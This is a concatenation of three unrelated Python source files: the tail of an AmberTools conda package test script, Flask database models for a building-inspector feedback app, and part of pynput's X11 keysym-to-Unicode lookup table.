cmd = 'find {} -type f -name "*.so"'.format(dest)
print('cmd: {}'.format(cmd))
output = subprocess.check_output(cmd, shell=True)
output = output.decode()
files = [fn for fn in output.split('\n') if fn]
return files
def get_tested_files(dest):
so_files = get_so_files(dest)
# files_in_bin = [os.path.join(dest, 'bin', fn)
# for fn in ['cpptraj', 'sqm', 'mdgx']]
files_in_bin = glob.glob(os.path.join(dest, 'bin/*'))
return [
fn
for fn in so_files + files_in_bin + glob.glob(
os.path.join(dest, 'bin/to_be_dispatched/*')) + glob.glob(
os.path.join(dest, 'lib/*dylib'))
]
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument("package_dir")
parser.add_argument("-py", dest='pyvers')
opt = parser.parse_args(args)
package_dir = opt.package_dir
tmp_dir = 'junk_folder' # only exists if non-conda package
conda_recipe = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', 'conda-ambertools-single-python'))
TEST_SCRIPT = '{}/run_test.sh'.format(conda_recipe)
print('conda_recipe', conda_recipe)
print('TEST_SCRIPT', TEST_SCRIPT)
pyvers = [
opt.pyvers,
] if opt.pyvers else ['2.7', '3.4', '3.5', '3.6', '3.7']
print('Python versions = {}'.format(pyvers))
print('conda package = {}'.format(is_conda_package(package_dir)))
errors = []
for py in pyvers:
env_name = ENV_ROOT + py
with run_env(env_name, py):
if is_conda_package(package_dir):
amberhome = find_miniconda_root() + '/envs/' + env_name
else:
# do not set CONDA_PREFIX to trigger
# unset PYTHONPATH in run_test.sh in this case.
os.environ['CONDA_PREFIX'] = ''
amberhome = os.path.join(
os.path.abspath(tmp_dir), AMBER_VERSION)
install_ambertools(package_dir, env_name, pyver=py)
if sys.platform.startswith('darwin'):
errors = ensure_no_gfortran_local(amberhome)
run_test(package_dir, amberhome, TEST_SCRIPT)
# check libgfortran
if errors:
print(
"ERROR: Files should not have /usr/local/gfortran in its content"
)
print(errors)
sys.exit(1)
else:
print("libgfortran fixed. Wonderful")
if __name__ == '__main__':
main()
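# Example invocation (a sketch; the script name and package path are hypothetical):
#   python test_ambertools.py /path/to/ambertools-package.tar.bz2 -py 3.6
# When -py is omitted, main() loops over Python 2.7 and 3.4-3.7 as listed above.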
|
# -*- coding: utf-8 -*-
import datetime as dt
from flask import json, render_template
from inspectors.database import (
Column,
db,
Model,
ReferenceCol,
relationship,
SurrogatePK,
)
REPR_DATE_FMT = "%Y/%m/%d"
class Supervisor(Model):
"""A person who supervises building inspectors"""
__tablename__ = 'supervisor'
id = Column(db.Integer, primary_key=True, index=True)
email = Column(db.String(80), index=True, nullable=False)
full_name = Column(db.String(150), nullable=False)
active = Column(db.Boolean, default=True)
inspectors = db.relationship('Inspector', backref='supervisor')
last_report = Column(db.DateTime, nullable=True)
def __repr__(self):
return '<Supervisor({0})>'.format(self.full_name)
def send_report(self):
raise NotImplementedError
def unsubscribe(self):
raise NotImplementedError
class Inspector(Model):
"""A person who does inspections."""
__tablename__ = 'inspector'
id = Column(db.Integer, primary_key=True, index=True)
inspector_key = Column(db.String(25), nullable=False, index=True)
first_name = Column(db.String(80), nullable=False)
last_name = Column(db.String(80), nullable=False)
photo_url = Column(db.String(80), nullable=True)
supervisor_id = Column(db.Integer, db.ForeignKey('supervisor.id'), nullable=False)
inspections = db.relationship('Inspection', backref='inspector')
@property
def full_name(self):
''' The format of the inspector name which
shows in all surveys. For now, keep it to
the first name (John) rather than the full
name (John Jones) or John J.
'''
return "{0}".format(self.first_name)
def __repr__(self):
return '<Inspector(id:{0}, name:{1})>'.format(self.inspector_key, " ".join([self.first_name, self.last_name]))
class Inspection(Model):
"""An inspection of a some construction by an inspector"""
__tablename__ = 'inspection'
id = Column(db.Integer, primary_key=True, index=True)
permit_number = Column(db.String(25), nullable=False)
date_inspected = Column(db.DateTime, nullable=False)
permit_type = Column(db.String(10), nullable=False)
permit_description = Column(db.String(50), nullable=True)
display_description = Column(db.String(50), nullable=False)
job_site_address = Column(db.String(200), nullable=False)
inspector_id = Column(db.Integer, db.ForeignKey('inspector.id'), nullable=False)
users_feedback = db.relationship('Feedback', backref='inspection')
@property
def permit_type_full(self):
return {
'BLDG': 'Building',
'ROOF': 'Roofing',
'ELEC': 'Electrical',
'PLUM': 'Plumbing',
'MECH': 'Mechanical',
'ZONE': 'Zoning'
}.get(self.permit_type, self.permit_type)
def generate_tf_id(self):
''' Generate the Typeform id of the personalized
form - needed for the feedback table
'''
from inspectors.surveys.typeform import TypeformIOClass
tf = TypeformIOClass()
inspector = Inspector.query.get(self.inspector_id).full_name
str_quiz = render_template(
'typeform/template.json',
inspector=inspector,
permit_number=self.permit_number,
itype=self.permit_type_full,
description=self.permit_description,
result=self.display_description,
addr=self.job_site_address)
json_quiz = json.loads(str_quiz)
result = tf.make_call(json_quiz)
return result['id']
@property
def tf_url(self):
return 'https://forms.typeform.io/to/' + self.generate_tf_id()
def is_cancelled(self):
return self.display_description in ('CANCELLATION BY INTERNET', 'INSPECTION CANCELLATION')
def is_passed(self):
return self.display_description in ('APPROVED',)
def __repr__(self):
return '<Inspection({0}:{1})>'.format(self.permit_number, self.date_inspected.strftime(REPR_DATE_FMT))
class Feedback(Model):
"""A many to many relation table between inspections and users that records
whether or not we've already asked a user for feedback on one particular
inspection.
"""
__tablename__ = 'feedback'
id = Column(db.Integer, primary_key=True, index=True)
user_id = Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
date_sent = Column(db.DateTime, nullable=True, default=dt.datetime.utcnow)
typeform_key = Column(db.String(50), nullable=False)
inspection_id = Column(db.Integer, db.ForeignKey('inspection.id'), nullable=False)
def __repr__(self):
d = self.date_sent
return '<Feedback({})>'.format(
"sent on: " + d.strftime(REPR_DATE_FMT) if d else "unsent")
|
# coding: utf-8
# pynput
# Copyright (C) 2015-2017 Moses Palmér
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# pylint: disable=C0111,C0302
SYMBOLS = {
'0': (0x0030, u'\u0030'),
'1': (0x0031, u'\u0031'),
'2': (0x0032, u'\u0032'),
'3': (0x0033, u'\u0033'),
'4': (0x0034, u'\u0034'),
'5': (0x0035, u'\u0035'),
'6': (0x0036, u'\u0036'),
'7': (0x0037, u'\u0037'),
'8': (0x0038, u'\u0038'),
'9': (0x0039, u'\u0039'),
'A': (0x0041, u'\u0041'),
'AE': (0x00c6, u'\u00C6'),
'Aacute': (0x00c1, u'\u00C1'),
'Abelowdot': (0x1001ea0, u'\u1EA0'),
'Abreve': (0x01c3, u'\u0102'),
'Abreveacute': (0x1001eae, u'\u1EAE'),
'Abrevebelowdot': (0x1001eb6, u'\u1EB6'),
'Abrevegrave': (0x1001eb0, u'\u1EB0'),
'Abrevehook': (0x1001eb2, u'\u1EB2'),
'Abrevetilde': (0x1001eb4, u'\u1EB4'),
'Acircumflex': (0x00c2, u'\u00C2'),
'Acircumflexacute': (0x1001ea4, u'\u1EA4'),
'Acircumflexbelowdot': (0x1001eac, u'\u1EAC'),
'Acircumflexgrave': (0x1001ea6, u'\u1EA6'),
'Acircumflexhook': (0x1001ea8, u'\u1EA8'),
'Acircumflextilde': (0x1001eaa, u'\u1EAA'),
'Adiaeresis': (0x00c4, u'\u00C4'),
'Agrave': (0x00c0, u'\u00C0'),
'Ahook': (0x1001ea2, u'\u1EA2'),
'Amacron': (0x03c0, u'\u0100'),
'Aogonek': (0x01a1, u'\u0104'),
'Arabic_0': (0x1000660, u'\u0660'),
'Arabic_1': (0x1000661, u'\u0661'),
'Arabic_2': (0x1000662, u'\u0662'),
'Arabic_3': (0x1000663, u'\u0663'),
'Arabic_4': (0x1000664, u'\u0664'),
'Arabic_5': (0x1000665, u'\u0665'),
'Arabic_6': (0x1000666, u'\u0666'),
'Arabic_7': (0x1000667, u'\u0667'),
'Arabic_8': (0x1000668, u'\u0668'),
'Arabic_9': (0x1000669, u'\u0669'),
'Arabic_ain': (0x05d9, u'\u0639'),
'Arabic_alef': (0x05c7, u'\u0627'),
'Arabic_alefmaksura': (0x05e9, u'\u0649'),
'Arabic_beh': (0x05c8, u'\u0628'),
'Arabic_comma': (0x05ac, u'\u060C'),
'Arabic_dad': (0x05d6, u'\u0636'),
'Arabic_dal': (0x05cf, u'\u062F'),
'Arabic_damma': (0x05ef, u'\u064F'),
'Arabic_dammatan': (0x05ec, u'\u064C'),
'Arabic_ddal': (0x1000688, u'\u0688'),
'Arabic_farsi_yeh': (0x10006cc, u'\u06CC'),
'Arabic_fatha': (0x05ee, u'\u064E'),
'Arabic_fathatan': (0x05eb, u'\u064B'),
'Arabic_feh': (0x05e1, u'\u0641'),
'Arabic_fullstop': (0x10006d4, u'\u06D4'),
'Arabic_gaf': (0x10006af, u'\u06AF'),
'Arabic_ghain': (0x05da, u'\u063A'),
'Arabic_ha': (0x05e7, u'\u0647'),
'Arabic_hah': (0x05cd, u'\u062D'),
'Arabic_hamza': (0x05c1, u'\u0621'),
'Arabic_hamza_above': (0x1000654, u'\u0654'),
'Arabic_hamza_below': (0x1000655, u'\u0655'),
'Arabic_hamzaonalef': (0x05c3, u'\u0623'),
'Arabic_hamzaonwaw': (0x05c4, u'\u0624'),
'Arabic_hamzaonyeh': (0x05c6, u'\u0626'),
'Arabic_hamzaunderalef': (0x05c5, u'\u0625'),
'Arabic_heh_doachashmee': (0x10006be, u'\u06BE'),
'Arabic_heh_goal': (0x10006c1, u'\u06C1'),
'Arabic_jeem': (0x05cc, u'\u062C'),
'Arabic_jeh': (0x1000698, u'\u0698'),
'Arabic_kaf': (0x05e3, u'\u0643'),
'Arabic_kasra': (0x05f0, u'\u0650'),
'Arabic_kasratan': (0x05ed, u'\u064D'),
'Arabic_keheh': (0x10006a9, u'\u06A9'),
'Arabic_khah': (0x05ce, u'\u062E'),
'Arabic_lam': (0x05e4, u'\u0644'),
'Arabic_madda_above': (0x1000653, u'\u0653'),
'Arabic_maddaonalef': (0x05c2, u'\u0622'),
'Arabic_meem': (0x05e5, u'\u0645'),
'Arabic_noon': (0x05e6, u'\u0646'),
'Arabic_noon_ghunna': (0x10006ba, u'\u06BA'),
'Arabic_peh': (0x100067e, u'\u067E'),
'Arabic_percent': (0x100066a, u'\u066A'),
'Arabic_qaf': (0x05e2, u'\u0642'),
'Arabic_question_mark': (0x05bf, u'\u061F'),
'Arabic_ra': (0x05d1, u'\u0631'),
'Arabic_rreh': (0x1000691, u'\u0691'),
'Arabic_sad': (0x05d5, u'\u0635'),
'Arabic_seen': (0x05d3, u'\u0633'),
'Arabic_semicolon': (0x05bb, u'\u061B'),
'Arabic_shadda': (0x05f1, u'\u0651'),
'Arabic_sheen': (0x05d4, u'\u0634'),
'Arabic_sukun': (0x05f2, u'\u0652'),
'Arabic_superscript_alef': (0x1000670, u'\u0670'),
'Arabic_tah': (0x05d7, u'\u0637'),
'Arabic_tatweel': (0x05e0, u'\u0640'),
'Arabic_tcheh': (0x1000686, u'\u0686'),
'Arabic_teh': (0x05ca, u'\u062A'),
'Arabic_tehmarbuta': (0x05c9, u'\u0629'),
'Arabic_thal': (0x05d0, u'\u0630'),
'Arabic_theh': (0x05cb, u'\u062B'),
'Arabic_tteh': (0x1000679, u'\u0679'),
'Arabic_veh': (0x10006a4, u'\u06A4'),
'Arabic_waw': (0x05e8, u'\u0648'),
'Arabic_yeh': (0x05ea, u'\u064A'),
'Arabic_yeh_baree': (0x10006d2, u'\u06D2'),
'Arabic_zah': (0x05d8, u'\u0638'),
'Arabic_zain': (0x05d2, u'\u0632'),
'Aring': (0x00c5, u'\u00C5'),
'Armenian_AT': (0x1000538, u'\u0538'),
'Armenian_AYB': (0x1000531, u'\u0531'),
'Armenian_BEN': (0x1000532, u'\u0532'),
'Armenian_CHA': (0x1000549, u'\u0549'),
'Armenian_DA': (0x1000534, u'\u0534'),
'Armenian_DZA': (0x1000541, u'\u0541'),
'Armenian_E': (0x1000537, u'\u0537'),
'Armenian_FE': (0x1000556, u'\u0556'),
'Armenian_GHAT': (0x1000542, u'\u0542'),
'Armenian_GIM': (0x1000533, u'\u0533'),
'Armenian_HI': (0x1000545, u'\u0545'),
'Armenian_HO': (0x1000540, u'\u0540'),
'Armenian_INI': (0x100053b, u'\u053B'),
'Armenian_JE': (0x100054b, u'\u054B'),
'Armenian_KE': (0x1000554, u'\u0554'),
'Armenian_KEN': (0x100053f, u'\u053F'),
'Armenian_KHE': (0x100053d, u'\u053D'),
'Armenian_LYUN': (0x100053c, u'\u053C'),
'Armenian_MEN': (0x1000544, u'\u0544'),
'Armenian_NU': (0x1000546, u'\u0546'),
'Armenian_O': (0x1000555, u'\u0555'),
'Armenian_PE': (0x100054a, u'\u054A'),
'Armenian_PYUR': (0x1000553, u'\u0553'),
'Armenian_RA': (0x100054c, u'\u054C'),
'Armenian_RE': (0x1000550, u'\u0550'),
'Armenian_SE': (0x100054d, u'\u054D'),
'Armenian_SHA': (0x1000547, u'\u0547'),
'Armenian_TCHE': (0x1000543, u'\u0543'),
'Armenian_TO': (0x1000539, u'\u0539'),
'Armenian_TSA': (0x100053e, u'\u053E'),
'Armenian_TSO': (0x1000551, u'\u0551'),
'Armenian_TYUN': (0x100054f, u'\u054F'),
'Armenian_VEV': (0x100054e, u'\u054E'),
'Armenian_VO': (0x1000548, u'\u0548'),
'Armenian_VYUN': (0x1000552, u'\u0552'),
'Armenian_YECH': (0x1000535, u'\u0535'),
'Armenian_ZA': (0x1000536, u'\u0536'),
'Armenian_ZHE': (0x100053a, u'\u053A'),
'Armenian_accent': (0x100055b, u'\u055B'),
'Armenian_amanak': (0x100055c, u'\u055C'),
'Armenian_apostrophe': (0x100055a, u'\u055A'),
'Armenian_at': (0x1000568, u'\u0568'),
'Armenian_ayb': (0x1000561, u'\u0561'),
'Armenian_ben': (0x1000562, u'\u0562'),
'Armenian_but': (0x100055d, u'\u055D'),
'Armenian_cha': (0x1000579, u'\u0579'),
'Armenian_da': (0x1000564, u'\u0564'),
'Armenian_dza': (0x1000571, u'\u0571'),
'Armenian_e': (0x1000567, u'\u0567'),
'Armenian_exclam': (0x100055c, u'\u055C'),
'Armenian_fe': (0x1000586, u'\u0586'),
'Armenian_full_stop': (0x1000589, u'\u0589'),
'Armenian_ghat': (0x1000572, u'\u0572'),
'Armenian_gim': (0x1000563, u'\u0563'),
'Armenian_hi': (0x1000575, u'\u0575'),
'Armenian_ho': (0x1000570, u'\u0570'),
'Armenian_hyphen': (0x100058a, u'\u058A'),
'Armenian_ini': (0x100056b, u'\u056B'),
'Armenian_je': (0x100057b, u'\u057B'),
'Armenian_ke': (0x1000584, u'\u0584'),
'Armenian_ken': (0x100056f, u'\u056F'),
'Armenian_khe': (0x100056d, u'\u056D'),
'Armenian_ligature_ew': (0x1000587, u'\u0587'),
'Armenian_lyun': (0x100056c, u'\u056C'),
'Armenian_men': (0x1000574, u'\u0574'),
'Armenian_nu': (0x1000576, u'\u0576'),
'Armenian_o': (0x1000585, u'\u0585'),
'Armenian_paruyk': (0x100055e, u'\u055E'),
'Armenian_pe': (0x100057a, u'\u057A'),
'Armenian_pyur': (0x1000583, u'\u0583'),
'Armenian_question': (0x100055e, u'\u055E'),
'Armenian_ra': (0x100057c, u'\u057C'),
'Armenian_re': (0x1000580, u'\u0580'),
'Armenian_se': (0x100057d, u'\u057D'),
'Armenian_separation_mark': (0x100055d, u'\u055D'),
'Armenian_sha': (0x1000577, u'\u0577'),
'Armenian_shesht': (0x100055b, u'\u055B'),
'Armenian_tche': (0x1000573, u'\u0573'),
'Armenian_to': (0x1000569, u'\u0569'),
'Armenian_tsa': (0x100056e, u'\u056E'),
'Armenian_tso': (0x1000581, u'\u0581'),
'Armenian_tyun': (0x100057f, u'\u057F'),
'Armenian_verjaket': (0x1000589, u'\u0589'),
'Armenian_vev': (0x100057e, u'\u057E'),
'Armenian_vo': (0x1000578, u'\u0578'),
'Armenian_vyun': (0x1000582, u'\u0582'),
'Armenian_yech': (0x1000565, u'\u0565'),
'Armenian_yentamna': (0x100058a, u'\u058A'),
'Armenian_za': (0x1000566, u'\u0566'),
'Armenian_zhe': (0x100056a, u'\u056A'),
'Atilde': (0x00c3, u'\u00C3'),
'B': (0x0042, u'\u0042'),
'Babovedot': (0x1001e02, u'\u1E02'),
'Byelorussian_SHORTU': (0x06be, u'\u040E'),
'Byelorussian_shortu': (0x06ae, u'\u045E'),
'C': (0x0043, u'\u0043'),
'Cabovedot': (0x02c5, u'\u010A'),
'Cacute': (0x01c6, u'\u0106'),
'Ccaron': (0x01c8, u'\u010C'),
'Ccedilla': (0x00c7, u'\u00C7'),
'Ccircumflex': (0x02c6, u'\u0108'),
'ColonSign': (0x10020a1, u'\u20A1'),
'CruzeiroSign': (0x10020a2, u'\u20A2'),
'Cyrillic_A': (0x06e1, u'\u0410'),
'Cyrillic_BE': (0x06e2, u'\u0411'),
'Cyrillic_CHE': (0x06fe, u'\u0427'),
'Cyrillic_CHE_descender': (0x10004b6, u'\u04B6'),
'Cyrillic_CHE_vertstroke': (0x10004b8, u'\u04B8'),
'Cyrillic_DE': (0x06e4, u'\u0414'),
'Cyrillic_DZHE': (0x06bf, u'\u040F'),
'Cyrillic_E': (0x06fc, u'\u042D'),
'Cyrillic_EF': (0x06e6, u'\u0424'),
'Cyrillic_EL': (0x06ec, u'\u041B'),
'Cyrillic_EM': (0x06ed, u'\u041C'),
'Cyrillic_EN': (0x06ee, u'\u041D'),
'Cyrillic_EN_descender': (0x10004a2, u'\u04A2'),
'Cyrillic_ER': (0x06f2, u'\u0420'),
'Cyrillic_ES': (0x06f3, u'\u0421'),
'Cyrillic_GHE': (0x06e7, u'\u0413'),
'Cyrillic_GHE_bar': (0x1000492, u'\u0492'),
'Cyrillic_HA': (0x06e8, u'\u0425'),
'Cyrillic_HARDSIGN': (0x06ff, u'\u042A'),
'Cyrillic_HA_descender': (0x10004b2, u'\u04B2'),
'Cyrillic_I': (0x06e9, u'\u0418'),
'Cyrillic_IE': (0x06e5, u'\u0415'),
'Cyrillic_IO': (0x06b3, u'\u0401'),
'Cyrillic_I_macron': (0x10004e2, u'\u04E2'),
'Cyrillic_JE': (0x06b8, u'\u0408'),
'Cyrillic_KA': (0x06eb, u'\u041A'),
'Cyrillic_KA_descender': (0x100049a, u'\u049A'),
'Cyrillic_KA_vertstroke': (0x100049c, u'\u049C'),
'Cyrillic_LJE': (0x06b9, u'\u0409'),
'Cyrillic_NJE': (0x06ba, u'\u040A'),
'Cyrillic_O': (0x06ef, u'\u041E'),
'Cyrillic_O_bar': (0x10004e8, u'\u04E8'),
'Cyrillic_PE': (0x06f0, u'\u041F'),
'Cyrillic_SCHWA': (0x10004d8, u'\u04D8'),
'Cyrillic_SHA': (0x06fb, u'\u0428'),
'Cyrillic_SHCHA': (0x06fd, u'\u0429'),
'Cyrillic_SHHA': (0x10004ba, u'\u04BA'),
'Cyrillic_SHORTI': (0x06ea, u'\u0419'),
'Cyrillic_SOFTSIGN': (0x06f8, u'\u042C'),
'Cyrillic_TE': (0x06f4, u'\u0422'),
'Cyrillic_TSE': (0x06e3, u'\u0426'),
'Cyrillic_U': (0x06f5, u'\u0423'),
'Cyrillic_U_macron': (0x10004ee, u'\u04EE'),
'Cyrillic_U_straight': (0x10004ae, u'\u04AE'),
'Cyrillic_U_straight_bar': (0x10004b0, u'\u04B0'),
'Cyrillic_VE': (0x06f7, u'\u0412'),
'Cyrillic_YA': (0x06f1, u'\u042F'),
'Cyrillic_YERU': (0x06f9, u'\u042B'),
'Cyrillic_YU': (0x06e0, u'\u042E'),
'Cyrillic_ZE': (0x06fa, u'\u0417'),
'Cyrillic_ZHE': (0x06f6, u'\u0416'),
'Cyrillic_ZHE_descender': (0x1000496, u'\u0496'),
'Cyrillic_a': (0x06c1, u'\u0430'),
'Cyrillic_be': (0x06c2, u'\u0431'),
'Cyrillic_che': (0x06de, u'\u0447'),
'Cyrillic_che_descender': (0x10004b7, u'\u04B7'),
'Cyrillic_che_vertstroke': (0x10004b9, u'\u04B9'),
'Cyrillic_de': (0x06c4, u'\u0434'),
'Cyrillic_dzhe': (0x06af, u'\u045F'),
'Cyrillic_e': (0x06dc, u'\u044D'),
'Cyrillic_ef': (0x06c6, u'\u0444'),
'Cyrillic_el': (0x06cc, u'\u043B'),
'Cyrillic_em': (0x06cd, u'\u043C'),
'Cyrillic_en': (0x06ce, u'\u043D'),
'Cyrillic_en_descender': (0x10004a3, u'\u04A3'),
'Cyrillic_er': (0x06d2, u'\u0440'),
'Cyrillic_es': (0x06d3, u'\u0441'),
'Cyrillic_ghe': (0x06c7, u'\u0433'),
'Cyrillic_ghe_bar': (0x1000493, u'\u0493'),
'Cyrillic_ha': (0x06c8, u'\u0445'),
'Cyrillic_ha_descender': (0x10004b3, u'\u04B3'),
'Cyrillic_hardsign': (0x06df, u'\u044A'),
'Cyrillic_i': (0x06c9, u'\u0438'),
'Cyrillic_i_macron': (0x10004e3, u'\u04E3'),
'Cyrillic_ie': (0x06c5, u'\u0435'),
'Cyrillic_io': (0x06a3, u'\u0451'),
'Cyrillic_je': (0x06a8, u'\u0458'),
'Cyrillic_ka': (0x06cb, u'\u043A'),
'Cyrillic_ka_descender': (0x100049b, u'\u049B'),
'Cyrillic_ka_vertstroke': (0x100049d, u'\u049D'),
'Cyrillic_lje': (0x06a9, u'\u0459'),
'Cyrillic_nje': (0x06aa, u'\u045A'),
'Cyrillic_o': (0x06cf, u'\u043E'),
'Cyrillic_o_bar': (0x10004e9, u'\u04E9'),
'Cyrillic_pe': (0x06d0, u'\u043F'),
'Cyrillic_schwa': (0x10004d9, u'\u04D9'),
'Cyrillic_sha': (0x06db, u'\u0448'),
'Cyrillic_shcha': (0x06dd, u'\u0449'),
'Cyrillic_shha': (0x10004bb, u'\u04BB'),
'Cyrillic_shorti': (0x06ca, u'\u0439'),
'Cyrillic_softsign': (0x06d8, u'\u044C'),
'Cyrillic_te': (0x06d4, u'\u0442'),
'Cyrillic_tse': (0x06c3, u'\u0446'),
'Cyrillic_u': (0x06d5, u'\u0443'),
'Cyrillic_u_macron': (0x10004ef, u'\u04EF'),
'Cyrillic_u_straight': (0x10004af, u'\u04AF'),
'Cyrillic_u_straight_bar': (0x10004b1, u'\u04B1'),
'Cyrillic_ve': (0x06d7, u'\u0432'),
'Cyrillic_ya': (0x06d1, u'\u044F'),
'Cyrillic_yeru': (0x06d9, u'\u044B'),
'Cyrillic_yu': (0x06c0, u'\u044E'),
'Cyrillic_ze': (0x06da, u'\u0437'),
'Cyrillic_zhe': (0x06d6, u'\u0436'),
'Cyrillic_zhe_descender': (0x1000497, u'\u0497'),
'D': (0x0044, u'\u0044'),
'Dabovedot': (0x1001e0a, u'\u1E0A'),
'Dcaron': (0x01cf, u'\u010E'),
'DongSign': (0x10020ab, u'\u20AB'),
'Dstroke': (0x01d0, u'\u0110'),
'E': (0x0045, u'\u0045'),
'ENG': (0x03bd, u'\u014A'),
'ETH': (0x00d0, u'\u00D0'),
'EZH': (0x10001b7, u'\u01B7'),
'Eabovedot': (0x03cc, u'\u0116'),
'Eacute': (0x00c9, u'\u00C9'),
'Ebelowdot': (0x1001eb8, u'\u1EB8'),
'Ecaron': (0x01cc, u'\u011A'),
'Ecircumflex': (0x00ca, u'\u00CA'),
'Ecircumflexacute': (0x1001ebe, u'\u1EBE'),
'Ecircumflexbelowdot': (0x1001ec6, u'\u1EC6'),
'Ecircumflexgrave': (0x1001ec0, u'\u1EC0'),
'Ecircumflexhook': (0x1001ec2, u'\u1EC2'),
'Ecircumflextilde': (0x1001ec4, u'\u1EC4'),
'EcuSign': (0x10020a0, u'\u20A0'),
'Ediaeresis': (0x00cb, u'\u00CB'),
'Egrave': (0x00c8, u'\u00C8'),
'Ehook': (0x1001eba, u'\u1EBA'),
'Emacron': (0x03aa, u'\u0112'),
'Eogonek': (0x01ca, u'\u0118'),
'Etilde': (0x1001ebc, u'\u1EBC'),
'EuroSign': (0x20ac, u'\u20AC'),
'F': (0x0046, u'\u0046'),
'FFrancSign': (0x10020a3, u'\u20A3'),
'Fabovedot': (0x1001e1e, u'\u1E1E'),
'Farsi_0': (0x10006f0, u'\u06F0'),
'Farsi_1': (0x10006f1, u'\u06F1'),
'Farsi_2': (0x10006f2, u'\u06F2'),
'Farsi_3': (0x10006f3, u'\u06F3'),
'Farsi_4': (0x10006f4, u'\u06F4'),
'Farsi_5': (0x10006f5, u'\u06F5'),
'Farsi_6': (0x10006f6, u'\u06F6'),
'Farsi_7': (0x10006f7, u'\u06F7'),
'Farsi_8': (0x10006f8, u'\u06F8'),
'Farsi_9': (0x10006f9, u'\u06F9'),
'Farsi_yeh': (0x10006cc, u'\u06CC'),
'G': (0x0047, u'\u0047'),
'Gabovedot': (0x02d5, u'\u0120'),
'Gbreve': (0x02ab, u'\u011E'),
'Gcaron': (0x10001e6, u'\u01E6'),
'Gcedilla': (0x03ab, u'\u0122'),
'Gcircumflex': (0x02d8, u'\u011C'),
'Georgian_an': (0x10010d0, u'\u10D0'),
'Georgian_ban': (0x10010d1, u'\u10D1'),
'Georgian_can': (0x10010ea, u'\u10EA'),
'Georgian_char': (0x10010ed, u'\u10ED'),
'Georgian_chin': (0x10010e9, u'\u10E9'),
'Georgian_cil': (0x10010ec, u'\u10EC'),
'Georgian_don': (0x10010d3, u'\u10D3'),
'Georgian_en': (0x10010d4, u'\u10D4'),
'Georgian_fi': (0x10010f6, u'\u10F6'),
'Georgian_gan': (0x10010d2, u'\u10D2'),
'Georgian_ghan': (0x10010e6, u'\u10E6'),
'Georgian_hae': (0x10010f0, u'\u10F0'),
'Georgian_har': (0x10010f4, u'\u10F4'),
'Georgian_he': (0x10010f1, u'\u10F1'),
'Georgian_hie': (0x10010f2, u'\u10F2'),
'Georgian_hoe': (0x10010f5, u'\u10F5'),
'Georgian_in': (0x10010d8, u'\u10D8'),
'Georgian_jhan': (0x10010ef, u'\u10EF'),
'Georgian_jil': (0x10010eb, u'\u10EB'),
'Georgian_kan': (0x10010d9, u'\u10D9'),
'Georgian_khar': (0x10010e5, u'\u10E5'),
'Georgian_las': (0x10010da, u'\u10DA'),
'Georgian_man': (0x10010db, u'\u10DB'),
'Georgian_nar': (0x10010dc, u'\u10DC'),
'Georgian_on': (0x10010dd, u'\u10DD'),
'Georgian_par': (0x10010de, u'\u10DE'),
'Georgian_phar': (0x10010e4, u'\u10E4'),
'Georgian_qar': (0x10010e7, u'\u10E7'),
'Georgian_rae': (0x10010e0, u'\u10E0'),
'Georgian_san': (0x10010e1, u'\u10E1'),
'Georgian_shin': (0x10010e8, u'\u10E8'),
'Georgian_tan': (0x10010d7, u'\u10D7'),
'Georgian_tar': (0x10010e2, u'\u10E2'),
'Georgian_un': (0x10010e3, u'\u10E3'),
'Georgian_vin': (0x10010d5, u'\u10D5'),
'Georgian_we': (0x10010f3, u'\u10F3'),
'Georgian_xan': (0x10010ee, u'\u10EE'),
'Georgian_zen': (0x10010d6, u'\u10D6'),
'Georgian_zhar': (0x10010df, u'\u10DF'),
'Greek_ALPHA': (0x07c1, u'\u0391'),
'Greek_ALPHAaccent': (0x07a1, u'\u0386'),
'Greek_BETA': (0x07c2, u'\u0392'),
'Greek_CHI': (0x07d7, u'\u03A7'),
'Greek_DELTA': (0x07c4, u'\u0394'),
'Greek_EPSILON': (0x07c5, u'\u0395'),
'Greek_EPSILONaccent': (0x07a2, u'\u0388'),
'Greek_ETA': (0x07c7, u'\u0397'),
'Greek_ETAaccent': (0x07a3, u'\u0389'),
'Greek_GAMMA': (0x07c3, u'\u0393'),
'Greek_IOTA': (0x07c9, u'\u0399'),
'Greek_IOTAaccent': (0x07a4, u'\u038A'),
'Greek_IOTAdieresis': (0x07a5, u'\u03AA'),
'Greek_KAPPA': (0x07ca, u'\u039A'),
'Greek_LAMBDA': (0x07cb, u'\u039B'),
'Greek_LAMDA': (0x07cb, u'\u039B'),
'Greek_MU': (0x07cc, u'\u039C'),
'Greek_NU': (0x07cd, u'\u039D'),
'Greek_OMEGA': (0x07d9, u'\u03A9'),
'Greek_OMEGAaccent': (0x07ab, u'\u038F'),
'Greek_OMICRON': (0x07cf, u'\u039F'),
'Greek_OMICRONaccent': (0x07a7, u'\u038C'),
'Greek_PHI': (0x07d6, u'\u03A6'),
'Greek_PI': (0x07d0, u'\u03A0'),
'Greek_PSI': (0x07d8, u'\u03A8'),
'Greek_RHO': (0x07d1, u'\u03A1'),
'Greek_SIGMA': (0x07d2, u'\u03A3'),
'Greek_TAU': (0x07d4, u'\u03A4'),
'Greek_THETA': (0x07c8, u'\u0398'),
'Greek_UPSILON': (0x07d5, u'\u03A5'),
'Greek_UPSILONaccent': (0x07a8, u'\u038E'),
'Greek_UPSILONdieresis': (0x07a9, u'\u03AB'),
'Greek_XI': (0x07ce, u'\u039E'),
'Greek_ZETA': (0x07c6, u'\u0396'),
'Greek_accentdieresis': (0x07ae, u'\u0385'),
'Greek_alpha': (0x07e1, u'\u03B1'),
'Greek_alphaaccent': (0x07b1, u'\u03AC'),
'Greek_beta': (0x07e2, u'\u03B2'),
'Greek_chi': (0x07f7, u'\u03C7'),
'Greek_delta': (0x07e4, u'\u03B4'),
'Greek_epsilon': (0x07e5, u'\u03B5'),
'Greek_epsilonaccent': (0x07b2, u'\u03AD'),
'Greek_eta': (0x07e7, u'\u03B7'),
'Greek_etaaccent': (0x07b3, u'\u03AE'),
'Greek_finalsmallsigma': (0x07f3, u'\u03C2'),
